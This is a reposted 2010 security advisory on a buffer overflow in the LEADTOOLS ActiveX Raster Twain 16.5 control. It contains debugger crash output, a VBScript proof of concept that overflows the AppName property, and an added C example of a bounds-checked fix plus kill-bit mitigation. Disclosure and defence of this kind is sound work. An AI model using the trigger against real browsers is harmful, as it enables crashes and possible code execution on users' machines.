
LEADTOOLS ActiveX Raster Twain 16.5 Buffer Overflow

Date: 28 Aug 2010 00:00:00
Reported by: LiquidWorm
Type: packetstorm
Source: packetstormsecurity.com

LEADTOOLS ActiveX Raster Twain 16.5 Buffer Overflow vulnerability

Code
`  
LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC  
  
  
Vendor: LEAD Technologies, Inc.  
Product Web Page: http://www.leadtools.com  
Affected Version: 16.5.0.2  
  
Summary: With LEADTOOLS you can control any scanner, digital camera  
or capture card that has a TWAIN (32 and 64 bit) device driver.  
High-level acquisition support is included for ease of use while  
low-level functionality is provided for flexibility and control in  
even the most demanding scanning applications.  
  
Desc: The Raster Twain Object Library suffers from a buffer overflow  
vulnerability because it fails to check the boundary of the user input.  
  
  
Tested On: Microsoft Windows XP Professional SP3 (EN)  
Windows Internet Explorer 8.0.6001.18702  
RFgen Mobile Development Studio 4.0.0.06 (Enterprise)  
  
  
===============================================================  
  
(2c4.2624): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000  
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0 nv up ei pl nz na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206  
ntdll!wcscpy+0xe:  
7c912f4e 668901 mov word ptr [ecx],ax ds:0023:01649000=????  
0:000> g  
(2c4.2624): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041  
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0 nv up ei pl nz na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206  
ntdll!RtlpNtMakeTemporaryKey+0x6a74:  
7c96c540 807b07ff cmp byte ptr [ebx+7],0FFh ds:0023:00410040=??  
  
==================================================================  
  
  
Registers:  
--------------------------------------------------  
EIP 7C912F4E  
EAX 00130041  
EBX 100255BC -> 10014840 -> Asc: @H@H  
ECX 01649000  
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA  
EDI 00000000  
ESI 0013EF6C -> BAAD0008  
EBP 0013EDA8 -> 0013EDDC  
ESP 0013EDA8 -> 0013EDDC  
  
--  
  
EIP 7C96C540  
EAX 00410039  
EBX 00410039  
ECX 00150000 -> 000000C8  
EDX 00150608 -> 7C97B5A0  
EDI 00410041  
ESI 00150000 -> 000000C8  
EBP 0013F228 -> 0013F278  
ESP 0013F220 -> 00150000  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+12 0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+16 00000000  
EBP+20 0013EF6C -> BAAD0008  
EBP+24 100255BC -> 10014840 -> Asc: @H@H  
EBP+28 0013EDB8 -> 00000000  
  
--  
  
EBP+8 00150000 -> 000000C8  
EBP+12 00410039  
EBP+16 7C96DBA4 -> Asc: RtlGetUserInfoHeap  
EBP+20 00000000  
EBP+24 00410041  
EBP+28 7C80FF12 -> 9868146A  
  
  
CompanyName LEAD Technologies, Inc.  
FileDescription LEADTOOLS ActiveX Raster Twain (Win32)  
FileVersion 16,5,0,2  
InternalName LTRTNU  
LegalCopyright © 1991-2009 LEAD Technologies, Inc.  
OriginalFileName LTRTNU.DLL  
ProductName LEADTOOLS® for Win32  
ProductVersion 16.5.0.0  
  
  
Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}  
RegKey Safe for Script: True  
RegKey Safe for Init: True  
Implements IObjectSafety: False  
  
  
Exception Code: ACCESS_VIOLATION  
  
Disasm: 7C912F4E MOV [ECX],AX (ntdll.dll)  
Disasm: 7C96C540 CMP BYTE PTR [EBX+7],FF (ntdll.dll)  
  
  
Exception Code: BREAKPOINT  
  
Disasm: 7C90120E INT3 (ntdll.dll)  
  
Seh Chain:  
--------------------------------------------------  
1 7C839AC0 KERNEL32.dll  
2 FC2950 VBSCRIPT.dll  
3 7C90E900 ntdll.dll  
  
  
7C912F4E MOV [ECX],AX <--- CRASH  
7C96C540 CMP BYTE PTR [EBX+7],FF <--- CRASH  
7C90120F RETN <--- CRASH  
  
  
==================================================================  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
liquidworm gmail com  
  
Zero Science Lab - http://www.zeroscience.mk  
  
24.08.2010  
  
  
Zero Science Lab Advisory ID: ZSL-2010-4960  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php  
  
  
  
PoC:  
  
  
<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />  
<script language='vbscript'>  
  
targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"  
prototype = "Property Let AppName As String"  
memberName = "AppName"  
progid = "LTRASTERTWAINLib_U.LEADRasterTwain_U"  
argCount = 1  
  
arg1=String(9236, "A")  
  
target.AppName = arg1  
  
</script>  
`
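The advisory attributes the crash to a missing bounds check on the `AppName` property value, and the first fault lands inside `ntdll!wcscpy`. The following C program is an added illustration, not code from the advisory, from LEAD Technologies or from LtocxTwainu.dll: it places the unbounded wide-string copy pattern beside a hardened setter that validates the length before copying and reports failure to the caller. The `twain_ctx` structure, the `APP_NAME_CAP` of 64 wide characters and the function names are assumptions for the demo; the real backing-store size inside the control is not known from the advisory. The unchecked variant is only ever called with a short literal, so the demo itself never writes out of bounds.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <wchar.h>

/* Capacity of the hypothetical fixed-size buffer backing the control's
 * AppName property. Assumed value; the real size is not in the advisory. */
#define APP_NAME_CAP 64

/* Length of the PoC string in the advisory (String(9236, "A")). */
#define POC_LEN 9236

/* Hypothetical per-control state standing in for the real object. */
typedef struct {
    wchar_t app_name[APP_NAME_CAP];
} twain_ctx;

/* Vulnerable pattern, shown for contrast: wcscpy copies until it sees the
 * terminator and never consults the destination size, which is why the
 * advisory's first fault is inside ntdll!wcscpy. Only called here with a
 * short literal so the demo does not corrupt its own memory. */
static void set_app_name_unchecked(twain_ctx *ctx, const wchar_t *name)
{
    wcscpy(ctx->app_name, name);
}

/* Portable bounded length: counts at most `cap` characters, so the caller
 * never walks past an untrusted, possibly unterminated input. */
static size_t bounded_wlen(const wchar_t *s, size_t cap)
{
    size_t n = 0;
    while (n < cap && s[n] != L'\0')
        n++;
    return n;
}

/* 1 if a name of `len` characters fits together with its terminator, else 0. */
static int app_name_fits(size_t len)
{
    return len < APP_NAME_CAP;
}

/* Hardened setter: validate before copying and report failure instead of
 * writing past the buffer. Returns 0 on success, -1 when the input is too
 * long (an unterminated input is treated as too long as well). */
static int set_app_name_checked(twain_ctx *ctx, const wchar_t *name)
{
    size_t n = bounded_wlen(name, APP_NAME_CAP);
    if (!app_name_fits(n))
        return -1;
    memcpy(ctx->app_name, name, (n + 1) * sizeof(wchar_t));
    return 0;
}

/* Feeds a constructed POC_LEN-character input through the checked setter.
 * Returns the setter's result; -1 is the expected outcome. */
static int demo_poc_length_rejected(void)
{
    static wchar_t name[POC_LEN + 1];
    twain_ctx ctx;
    for (size_t i = 0; i < POC_LEN; i++)
        name[i] = L'A';
    name[POC_LEN] = L'\0';
    return set_app_name_checked(&ctx, name);
}

/* Feeds a realistic short name through the checked setter and verifies the
 * stored copy. Returns 0 on success, -1 if rejected or mismatched. */
static int demo_short_name_accepted(void)
{
    twain_ctx ctx;
    if (set_app_name_checked(&ctx, L"Scanner UI") != 0)
        return -1;
    return wcscmp(ctx.app_name, L"Scanner UI") == 0 ? 0 : -1;
}

int main(void)
{
    twain_ctx ctx;
    set_app_name_unchecked(&ctx, L"demo");  /* safe: 5 wide chars into 64 */
    printf("unchecked copy of short name: %ls\n", ctx.app_name);
    printf("PoC-length name rejected by checked setter: %s\n",
           demo_poc_length_rejected() == -1 ? "yes" : "NO");
    printf("short name accepted by checked setter: %s\n",
           demo_short_name_accepted() == 0 ? "yes" : "NO");
    return 0;
}
```

The checked setter measures with a capped scan rather than `wcslen`, so an input that is too long or not terminated is rejected without ever reading past the capacity, and the copy size is derived from the validated length rather than from the source. Where the installed control cannot be updated, the operator-side mitigation for an ActiveX control like this one is Internet Explorer's kill bit: a `Compatibility Flags` DWORD of 0x400 under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}` stops the browser from instantiating that CLSID.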
